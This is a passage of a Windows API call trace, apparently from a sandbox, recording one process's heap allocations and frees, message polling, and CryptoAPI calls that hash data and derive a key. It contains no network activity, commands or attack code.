0x2e54fd8 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0236.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0236.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0236.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0236.531] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0236.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0236.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0236.531] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0236.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0236.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0236.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0236.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0236.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0236.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0236.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0236.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0236.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0236.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0236.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0236.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0236.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0236.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0236.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0236.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0236.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0236.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0236.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51580, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0236.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0236.534] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0236.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0236.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.534] CryptHashData (hHash=0xa87510, pbData=0x2e54f78, dwDataLen=0x3, dwFlags=0x1) returned 1 [0236.534] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.535] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0236.535] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.535] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0236.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0236.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0236.535] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0236.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0236.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0236.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0236.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0236.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0236.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0236.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0236.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0236.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0236.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0236.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0236.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0236.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0236.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0236.536] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0236.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0236.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0236.536] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0236.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0236.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0236.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0236.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0236.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0236.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0236.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0236.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0236.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0236.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0236.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0236.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0236.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0236.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0236.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0236.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0236.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0236.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0236.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0236.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0236.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0236.538] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0236.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0236.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0236.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0236.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0236.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0236.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51328 [0236.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51328, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0236.539] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87510, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa874d0) returned 1 [0236.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0236.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0236.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0236.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0236.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0236.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0236.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0236.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0236.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0236.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0236.540] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.540] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.540] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0236.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0236.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0236.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0236.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0236.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0236.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0236.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0236.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0236.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0236.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0236.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0236.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0236.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0236.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0236.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0236.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a88 [0236.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0236.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0236.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0236.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0236.541] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0236.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0236.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0236.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: 